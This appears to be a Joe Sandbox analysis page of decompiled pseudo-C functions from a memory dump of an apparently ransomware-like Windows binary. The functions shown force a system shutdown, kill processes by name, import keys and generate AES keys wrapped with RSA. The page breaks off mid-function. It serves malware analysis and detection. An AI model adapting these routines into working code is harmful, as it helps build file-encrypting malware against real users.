API ID: Crypt$ContextDestroyEncryptParam$AcquireDuplicateImportRelease
String ID: $Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 578106173-2720055428
Opcode ID: d525aa01fd35fc7db08da265442c87cd3294d5c8114921d99c1dd482f0aaa704
Instruction ID: 98571f543d47d2a24e976a3be9faa99119fe5bcd7adf20aaf00f3879104dc3a4
Opcode Fuzzy Hash: d525aa01fd35fc7db08da265442c87cd3294d5c8114921d99c1dd482f0aaa704
Instruction Fuzzy Hash: E6710570A00209EFEF25CFA4CC45BEEBBB8FB08704F104119E601BB295D7B1A984CB60

Uniqueness

Uniqueness Score: -1.00%

Function 012FB140, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E012FB140(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				signed int _t12;
				long _t23;
				void* _t26;
				signed int _t27;

				_t12 =  *0x13a4018; // 0x39cca9f6
				_v8 = _t12 ^ _t27;
				_v28 = 0xffffffff;
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
					LookupPrivilegeValueW(0, L"SeShutdownPrivilege",  &(_v24.Privileges));
					_v24.PrivilegeCount = 1;
					_v12 = 2;
					AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
					CloseHandle(_v28);
					_t23 = GetLastError();
					if(_t23 == 0) {
						__imp__InitiateShutdownW(_t23, 0x13836c0, _a4, 4, 2);
					}
				}
				return E0132EA79(_v8 ^ _t27, _t26);
			}

0x012fb146
0x012fb14d
0x012fb153
0x012fb16c
0x012fb179
0x012fb188
0x012fb195
0x012fb19c
0x012fb1a5
0x012fb1ab
0x012fb1b3
0x012fb1c2
0x012fb1c2
0x012fb1b3
0x012fb1d5

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 012FB15D
OpenProcessToken.ADVAPI32(00000000), ref: 012FB164
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 012FB179
AdjustTokenPrivileges.ADVAPI32(FFFFFFFF,00000000,?,00000000,00000000,00000000), ref: 012FB19C
CloseHandle.KERNEL32(FFFFFFFF), ref: 012FB1A5
GetLastError.KERNEL32 ref: 012FB1AB
InitiateShutdownW.ADVAPI32(00000000,013836C0,00000002,00000004,00000002), ref: 012FB1C2

Strings

SeShutdownPrivilege, xrefs: 012FB172

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentErrorHandleInitiateLastLookupOpenPrivilegePrivilegesShutdownValue
String ID: SeShutdownPrivilege
API String ID: 556465800-3733053543
Opcode ID: f49a3685a6b33e5626d0d7b4ad22af237ee2d6971ba6884e0b12ace5d262aeae
Instruction ID: 6ada5051d9d92ebbdaebd9431a59164334aef64040f342b6f9574c9dde93bc72
Opcode Fuzzy Hash: f49a3685a6b33e5626d0d7b4ad22af237ee2d6971ba6884e0b12ace5d262aeae
Instruction Fuzzy Hash: 381121B1A40309ABDB31AFA4DC4AFAEFB7CBB04711F510119F705A62C4DB7065449B55

Uniqueness

Uniqueness Score: -1.00%

Function 012FA970, Relevance: 10.6, APIs: 7, Instructions: 125
processCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E012FA970(void* __ebx, void* __edi, intOrPtr* _a4) {
				int _v8;
				char _v16;
				signed int _v20;
				char _v540;
				long _v568;
				char _v572;
				void* _v576;
				void* _v580;
				signed int _v584;
				int _v588;
				char _v604;
				void* __esi;
				void* __ebp;
				signed int _t31;
				signed int _t32;
				struct tagPROCESSENTRY32W* _t39;
				intOrPtr* _t42;
				void* _t48;
				void* _t54;
				void* _t59;
				void* _t60;
				intOrPtr _t65;
				signed int _t67;
				intOrPtr* _t68;
				void* _t70;
				intOrPtr* _t73;
				void* _t76;
				void* _t77;
				void* _t78;
				signed int _t79;
				void* _t80;
				void* _t81;
				void* _t82;

				_push(0xffffffff);
				_push(0x1365a80);
				_push( *[fs:0x0]);
				_t81 = _t80 - 0x24c;
				_t31 =  *0x13a4018; // 0x39cca9f6
				_t32 = _t31 ^ _t79;
				_v20 = _t32;
				_push(__ebx);
				_push(_t32);
				 *[fs:0x0] =  &_v16;
				_t73 = _a4;
				if( *((intOrPtr*)(_t73 + 0x10)) != 0) {
					_t59 = CreateToolhelp32Snapshot(2, 0);
					_v580 = _t59;
					if(_t59 == 0xffffffff) {
						goto L16;
					} else {
						E013478D0(_t73,  &_v572, 0, 0x228);
						_t82 = _t81 + 0xc;
						_v576 = 0x22c;
						_t39 =  &_v576;
						Process32FirstW(_t59, _t39);
						_t77 = CloseHandle;
						if(_t39 == 0) {
							L15:
							CloseHandle(_t59);
							goto L16;
						} else {
							do {
								_v588 = 0;
								_v604 = 0;
								_t42 =  &_v540;
								_v584 = 7;
								_t70 = _t42 + 2;
								do {
									_t65 =  *_t42;
									_t42 = _t42 + 2;
								} while (_t65 != 0);
								_push(_t42 - _t70 >> 1);
								E012F51B0(_t59,  &_v604, _t73, _t77,  &_v540);
								_v8 = 0;
								_t48 = E012FA4B0(_t59,  &_v604, _t73);
								_v8 = 0xffffffff;
								_t60 = _t48;
								_t67 = _v584;
								if(_t67 >= 8) {
									_push(2 + _t67 * 2);
									E012F56A0(_t60, _t73, _v604);
									_t82 = _t82 + 8;
								}
								if(_t60 == 0) {
									goto L14;
								} else {
									_t78 = OpenProcess(1, 0, _v568);
									if(_t78 == 0) {
										_t77 = CloseHandle;
										goto L14;
									} else {
										TerminateProcess(_t78, 0);
										_t77 = CloseHandle;
										CloseHandle(_t78);
										_t68 = _t73;
										if( *((intOrPtr*)(_t73 + 0x14)) >= 8) {
											_t68 =  *_t73;
										}
										_t54 = E012F8820(_t68,  *((intOrPtr*)(_t73 + 0x10)), 0, "*", 1);
										_t82 = _t82 + 0xc;
										if(_t54 != 0xffffffff) {
											goto L14;
										} else {
										}
									}
								}
								goto L17;
								L14:
								_t59 = _v580;
							} while (Process32NextW(_t59,  &_v576) != 0);
							goto L15;
						}
					}
				}
				L17:
				 *[fs:0x0] = _v16;
				_pop(_t76);
				return E0132EA79(_v20 ^ _t79, _t76);
			}

0x012fa973
0x012fa975
0x012fa980
0x012fa981
0x012fa987
0x012fa98c
0x012fa98e
0x012fa991
0x012fa994
0x012fa998
0x012fa99e
0x012fa9a5
0x012fa9b5
0x012fa9b7
0x012fa9c0
0x00000000
0x012fa9c6
0x012fa9d4
0x012fa9d9
0x012fa9dc
0x012fa9e6
0x012fa9ee
0x012fa9f4
0x012fa9fc
0x012fab05
0x012fab06
0x00000000
0x012faa02
0x012faa02
0x012faa04
0x012faa0e
0x012faa15
0x012faa1b
0x012faa25
0x012faa30
0x012faa30
0x012faa33
0x012faa36
0x012faa45
0x012faa4d
0x012faa59
0x012faa61
0x012faa66
0x012faa6d
0x012faa6f
0x012faa78
0x012faa81
0x012faa88
0x012faa8d
0x012faa8d
0x012faa92
0x00000000
0x012faa94
0x012faaa4
0x012faaa8
0x012faae3
0x00000000
0x012faaaa
0x012faaad
0x012faab4
0x012faaba
0x012faac0
0x012faac2
0x012faac4
0x012faac4
0x012faad2
0x012faad7
0x012faadd
0x00000000
0x012faadf
0x012faadf
0x012faadd
0x012faaa8
0x00000000
0x012faae9
0x012faae9
0x012faafd
0x00000000
0x012faa02
0x012fa9fc
0x012fa9c0
0x012fab0a
0x012fab0d
0x012fab16
0x012fab25

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 012FA9AF
Process32FirstW.KERNEL32(00000000,0000022C), ref: 012FA9EE
OpenProcess.KERNEL32(00000001,00000000,?,?,?), ref: 012FAA9E
TerminateProcess.KERNEL32(00000000,00000000), ref: 012FAAAD
CloseHandle.KERNEL32(00000000), ref: 012FAABA
Process32NextW.KERNEL32(?,0000022C), ref: 012FAAF7
CloseHandle.KERNEL32(00000000), ref: 012FAB06

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: aceb8b136bc6426930d51ff01db4ccf1f13d0e6023866cfb795d2554e45bae02
Instruction ID: 6ac2e0e01b7db85b1b6c9ce454c7304ef3ba96f80195990e741fd8356f7daaa3
Opcode Fuzzy Hash: aceb8b136bc6426930d51ff01db4ccf1f13d0e6023866cfb795d2554e45bae02
Instruction Fuzzy Hash: AF41B675910319AFDB30DF64DC49B9AF77CFB14710F1442A9E609A7280EB746A88CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01309AF0, Relevance: 10.6, APIs: 7, Instructions: 90
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E01309AF0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, char* _a4) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				signed int _t17;
				char* _t19;
				signed char _t34;
				char* _t45;
				void* _t48;
				signed int _t49;

				_t46 = __esi;
				_t17 =  *0x13a4018; // 0x39cca9f6
				_v8 = _t17 ^ _t49;
				_t45 = _a4;
				_t34 = 0;
				_v16 = __ecx;
				if(_t45[0x10] != 0) {
					_t19 = _t45;
					_v12 = 0;
					if(_t45[0x14] >= 0x10) {
						_t19 =  *_t45;
					}
					if(CryptStringToBinaryA(_t19, 0, 1, 0,  &_v12, 0, 0) != 0) {
						_push(_t46);
						_t48 = HeapAlloc(GetProcessHeap(), 0, _v12);
						if(_t48 != 0) {
							if(_t45[0x14] >= 0x10) {
								_t45 =  *_t45;
							}
							if(CryptStringToBinaryA(_t45, 0, 1, _t48,  &_v12, 0, 0) != 0) {
								CryptImportKey( *(_v16 + 0x5c), _t48, _v12, 0, 0, _v16 + 0x58);
								_t34 =  !=  ? 1 : _t34 & 0x000000ff;
							}
							HeapFree(GetProcessHeap(), 0, _t48);
						}
						_pop(_t46);
					}
					return E0132EA79(_v8 ^ _t49, _t46);
				} else {
					return E0132EA79(_v8 ^ _t49, __esi);
				}
			}

0x01309af0
0x01309af6
0x01309afd
0x01309b02
0x01309b05
0x01309b07
0x01309b0e
0x01309b28
0x01309b2a
0x01309b31
0x01309b33
0x01309b33
0x01309b4c
0x01309b4e
0x01309b62
0x01309b66
0x01309b6c
0x01309b6e
0x01309b6e
0x01309b86
0x01309b9a
0x01309baa
0x01309baa
0x01309bb7
0x01309bb7
0x01309bbd
0x01309bbd
0x01309bcf
0x01309b11
0x01309b21
0x01309b21

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 01309B44
GetProcessHeap.KERNEL32 ref: 01309B52
HeapAlloc.KERNEL32(00000000,00000000,00000000), ref: 01309B5C
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 01309B7E
CryptImportKey.ADVAPI32(?,00000000,00000000,00000000,00000000,?), ref: 01309B9A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01309BB0
HeapFree.KERNEL32(00000000), ref: 01309BB7

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Heap$Crypt$BinaryProcessString$AllocFreeImport
String ID:
API String ID: 1508550536-0
Opcode ID: 8e97e524715dbc664e83ae8c57589ab2ba75dc3ace953692883691ec6b2230d7
Instruction ID: 855e002762ce23cc32df62047e1137f62593a2dce805e2f220485f239382acae
Opcode Fuzzy Hash: 8e97e524715dbc664e83ae8c57589ab2ba75dc3ace953692883691ec6b2230d7
Instruction Fuzzy Hash: 75218231640204BBEB359FA5DC55F9ABBBCEF44724F50005AF605AB1C0D7B1A984CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01309BE0, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E01309BE0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				int _v8;
				char _v16;
				signed int _v20;
				long* _v24;
				long* _v28;
				intOrPtr _v32;
				int _v36;
				char _v52;
				signed int _v56;
				int _v60;
				short _v76;
				intOrPtr _v80;
				int _v84;
				int _v88;
				char _v92;
				intOrPtr _v96;
				int _v100;
				char _v116;
				char _v117;
				int _v124;
				intOrPtr _v128;
				int _v132;
				char _v148;
				void* __esi;
				void* __ebp;
				signed int _t86;
				signed int _t87;
				long** _t89;
				long** _t92;
				int _t95;
				intOrPtr _t100;
				intOrPtr _t111;
				signed int _t112;
				char* _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				char* _t138;
				void* _t147;
				char* _t152;
				void* _t153;
				intOrPtr* _t154;
				void* _t155;
				char* _t156;
				signed int _t157;
				void* _t158;
				void* _t159;

				_t132 = __ebx;
				_t159 = _t158 - 0x84;
				_t86 =  *0x13a4018; // 0x39cca9f6
				_t87 = _t86 ^ _t157;
				_v20 = _t87;
				 *[fs:0x0] =  &_v16;
				_t154 = __ecx;
				_t89 =  &_v28;
				_v117 = 0;
				_v28 = 0;
				__imp__CryptAcquireContextW(_t89, 0, L"Microsoft Enhanced RSA and AES Cryptographic Provider", 0x18, 0xf0000000, _t87, __edi, _t153,  *[fs:0x0], 0x1366ddd, 0xffffffff);
				if(_t89 == 0) {
					L29:
					 *[fs:0x0] = _v16;
					_pop(_t155);
					return E0132EA79(_v20 ^ _t157, _t155);
				}
				_t92 =  &_v24;
				_v24 = 0;
				__imp__CryptGenKey(_v28, 0x6610, 1, _t92);
				if(_t92 != 0) {
					_t152 = E0130A050(_v24);
					_t95 = E01309150( *((intOrPtr*)(_t154 + 0x58)), 1, _t152);
					_v124 = _t95;
					if(_t152 != 0 && _t95 != 0) {
						_push(0);
						E012F7D00(__ebx,  &_v116, __edx, _t95);
						_v8 = 0;
						if(E0130A0E0(_v24,  &_v116, _t152) != 0 && E0130A0A0( *((intOrPtr*)(_t154 + 0x58)), 1,  &_v116, _t152, _v124) != 0) {
							_v88 = 0;
							_v84 = 2;
							_v80 = 0xc;
							_v92 = 0x1396adc;
							_v60 = 0;
							_v56 = 7;
							_v76 = 0;
							_v8 = 1;
							 *((intOrPtr*)( *_t154 + 4))( &_v92);
							E012F6850(__ebx,  &_v52,  &_v76, _t152);
							_v8 = 2;
							_v124 = _v36;
							_t152 = E01309150( *((intOrPtr*)(_t154 + 0x58)), 1, _t152);
							if(_v124 > 0 && _t152 != 0) {
								E013034B0(__ebx,  &_v52, _t152, _t152, 0);
								if(E0130A0A0( *((intOrPtr*)(_t154 + 0x58)), 1,  &_v52, _v124, _t152) != 0) {
									_t144 = _t154 + 0x6c;
									_t121 =  &_v52;
									if(_t154 + 0x6c != _t121) {
										_push(_v36);
										_t130 =  >=  ? _v52 : _t121;
										E012F7F00(_t132, _t144,  &_v76, _t152,  >=  ? _v52 : _t121);
									}
									_t152 = E0130A7C0(_t132,  &_v148,  &_v116,  &_v52);
									_t156 = _t154 + 0x1c;
									_t159 = _t159 + 4;
									if(_t156 != _t152) {
										_t127 =  *((intOrPtr*)(_t156 + 0x14));
										if(_t127 >= 0x10) {
											_push(_t127 + 1);
											E012F56A0(_t132, _t152,  *_t156);
											_t159 = _t159 + 8;
										}
										 *(_t156 + 0x10) = 0;
										 *((intOrPtr*)(_t156 + 0x14)) = 0xf;
										 *_t156 = 0;
										asm("movups xmm0, [edi]");
										asm("movups [esi], xmm0");
										asm("movq xmm0, [edi+0x10]");
										asm("movq [esi+0x10], xmm0");
										 *(_t152 + 0x10) = 0;
										 *((intOrPtr*)(_t152 + 0x14)) = 0xf;
										 *_t152 = 0;
									}
									_t124 = _v128;
									if(_t124 >= 0x10) {
										_push(_t124 + 1);
										E012F56A0(_t132, _t152, _v148);
										_t159 = _t159 + 8;
									}
									_v132 = 0;
									_v128 = 0xf;
									_v148 = 0;
									_v117 = 1;
								}
							}
							_t111 = _v32;
							if(_t111 >= 0x10) {
								_push(_t111 + 1);
								E012F56A0(_t132, _t152, _v52);
								_t159 = _t159 + 8;
							}
							_t112 = _v56;
							_v36 = 0;
							_v32 = 0xf;
							_v52 = 0;
							_v92 = 0x1396adc;
							if(_t112 >= 8) {
								_push(2 + _t112 * 2);
								E012F56A0(_t132, _t152, _v76);
								_t159 = _t159 + 8;
							}
							_v60 = 0;
							_v56 = 7;
							_v76 = 0;
							_v92 = 0x1396ae4;
						}
						_t100 = _v96;
						if(_t100 >= 0x10) {
							_push(_t100 + 1);
							E012F56A0(_t132, _t152, _v116);
						}
						_v100 = 0;
						_v96 = 0xf;
						_v116 = 0;
					}
					CryptDestroyKey(_v24);
				}
				CryptReleaseContext(_v28, 0);
				_t147 = 4;
				_t138 =  &_v28;
				do {
					 *_t138 = 0;
					_t138 = _t138 + 1;
					_t147 = _t147 - 1;
				} while (_t147 != 0);
				goto L29;
			}

0x01309be0
0x01309bf1
0x01309bf7
0x01309bfc
0x01309bfe
0x01309c07
0x01309c0d
0x01309c1d
0x01309c20
0x01309c25
0x01309c2c
0x01309c34
0x01309ec0
0x01309ec6
0x01309ecf
0x01309edd
0x01309edd
0x01309c3a
0x01309c3d
0x01309c4f
0x01309c57
0x01309c65
0x01309c6d
0x01309c72
0x01309c77
0x01309c85
0x01309c8b
0x01309c94
0x01309ca6
0x01309cc8
0x01309ccf
0x01309cd6
0x01309cdd
0x01309ce4
0x01309ceb
0x01309cf2
0x01309cf6
0x01309d02
0x01309d0b
0x01309d11
0x01309d1d
0x01309d29
0x01309d2b
0x01309d3f
0x01309d58
0x01309d5e
0x01309d61
0x01309d66
0x01309d6c
0x01309d6f
0x01309d74
0x01309d74
0x01309d8b
0x01309d8d
0x01309d90
0x01309d95
0x01309d97
0x01309d9d
0x01309da0
0x01309da3
0x01309da8
0x01309da8
0x01309dab
0x01309db2
0x01309db9
0x01309dbc
0x01309dbf
0x01309dc2
0x01309dc7
0x01309dcc
0x01309dd3
0x01309dda
0x01309dda
0x01309ddd
0x01309de3
0x01309de6
0x01309ded
0x01309df2
0x01309df2
0x01309df5
0x01309dfc
0x01309e03
0x01309e0a
0x01309e0a
0x01309d58
0x01309e0e
0x01309e14
0x01309e17
0x01309e1b
0x01309e20
0x01309e20
0x01309e23
0x01309e26
0x01309e2d
0x01309e34
0x01309e38
0x01309e42
0x01309e4b
0x01309e4f
0x01309e54
0x01309e54
0x01309e59
0x01309e60
0x01309e67
0x01309e6b
0x01309e6b
0x01309e72
0x01309e78
0x01309e7b
0x01309e7f
0x01309e84
0x01309e87
0x01309e8e
0x01309e95
0x01309e95
0x01309e9c
0x01309e9c
0x01309ea7
0x01309ead
0x01309eb2
0x01309eb5
0x01309eb5
0x01309eb8
0x01309ebb
0x01309ebb
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000,39CCA9F6,00000000), ref: 01309C2C
CryptGenKey.ADVAPI32(00000000,00006610,00000001,?), ref: 01309C4F
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01309EA7

Part of subcall function 0130A050: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 0130A076

Part of subcall function 01309150: CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0130917A

CryptDestroyKey.ADVAPI32(00000000,?,00000001,00000000,00000000), ref: 01309E9C

Part of subcall function 0130A0E0: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000001,?,01309CA4,00000000,?,00000000,00000000,00000000,?,00000001,00000000), ref: 0130A0FC

Part of subcall function 0130A0A0: CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000001,?,00000000,?,01309CBE,?,00000001,?,00000000,?,00000000,?), ref: 0130A0C2

Part of subcall function 012F6850: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 012F6898
Part of subcall function 012F6850: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 012F68E1

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 01309C16

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Crypt$ByteCharContextEncryptExportMultiWide$AcquireDestroyRelease
String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 854834478-63410773
Opcode ID: 288a29be765e9ed1f7693c15b23f412f3a08ad6066ec0cc477b11f84fc1bd568
Instruction ID: c71622b0c85040b383c8b9d272a80c7a3afe6cb66fe91b7dd806111713e499ed
Opcode Fuzzy Hash: 288a29be765e9ed1f7693c15b23f412f3a08ad6066ec0cc477b11f84fc1bd568
Instruction Fuzzy Hash: A0915C70810249AEEF21DFA4DC54BAEBFB5FF10308F24012CE559A72D2D7765989CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0135EA10, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E0135EA10(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E013555C1(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x0135ea15
0x0135ea16
0x0135ea1d
0x0135eac1
0x0135eada
0x0135eae0
0x0135eae5
0x0135eae7
0x0135eae7
0x0135eaed
0x0135eaf0
0x0135eaf0
0x0135eadc
0x0135eadc
0x00000000
0x0135eadc
0x0135ea23
0x0135ea28
0x00000000
0x00000000
0x0135ea2e
0x0135ea33
0x0135ea35
0x0135ea35
0x0135ea3b
0x00000000
0x00000000
0x0135ea40
0x0135ea57
0x0135ea57
0x0135ea60
0x0135ea62
0x00000000
0x00000000
0x0135ea64
0x0135ea69
0x0135ea6b
0x0135ea6b
0x0135ea71
0x00000000
0x00000000
0x0135ea76
0x0135ea94
0x0135ea96
0x0135eab9
0x00000000
0x0135eabe
0x0135eab1
0x00000000
0x00000000
0x0135eab3
0x00000000
0x0135eab3
0x0135ea78
0x0135ea80
0x00000000
0x00000000
0x0135ea82
0x0135ea85
0x0135ea8b
0x00000000
0x00000000
0x00000000
0x0135ea8d
0x0135ea8f
0x0135ea91
0x00000000
0x0135ea91
0x0135ea42
0x0135ea4a
0x00000000
0x00000000
0x0135ea4c
0x0135ea4f
0x0135ea55
0x00000000
0x00000000
0x00000000
0x0135ea55
0x0135ea5b
0x0135ea5d
0x00000000

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,0135ED2E,00000002,00000000,?,?,?,0135ED2E,?,00000000), ref: 0135EAA9
GetLocaleInfoW.KERNEL32(00000000,20001004,0135ED2E,00000002,00000000,?,?,?,0135ED2E,?,00000000), ref: 0135EAD2
GetACP.KERNEL32(?,?,0135ED2E,?,00000000), ref: 0135EAE7

Strings

OCP, xrefs: 0135EA64
ACP, xrefs: 0135EA2E

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 4711e46738fa50abaa9cd9e672f90a31bf5435615bb9391ba3fb882e807a25cf
Instruction ID: cdf96b15a57833836a16e0d0d03defa6b05a37611286d7ce6ae9b443e74268d1
Opcode Fuzzy Hash: 4711e46738fa50abaa9cd9e672f90a31bf5435615bb9391ba3fb882e807a25cf
Instruction Fuzzy Hash: 11216D62B40105AAFBB58F78C940EA7F6BBBB44E58B468474FD0AD7205E732DB40C350

Uniqueness

Uniqueness Score: -1.00%

Function 0135711A, Relevance: 7.8, APIs: 5, Instructions: 330
timeCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E0135711A(void* __ebx, signed short* __edi, void* __eflags, signed short* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr* _v28;
				signed short _v32;
				signed int _v36;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v124;
				char _v528;
				intOrPtr _v532;
				char _v536;
				char _v636;
				char _v640;
				void* __esi;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t93;
				signed int _t101;
				signed int _t103;
				long _t105;
				signed int* _t108;
				signed int _t109;
				signed int _t117;
				signed int _t120;
				signed int _t123;
				signed short _t124;
				signed short _t129;
				void* _t131;
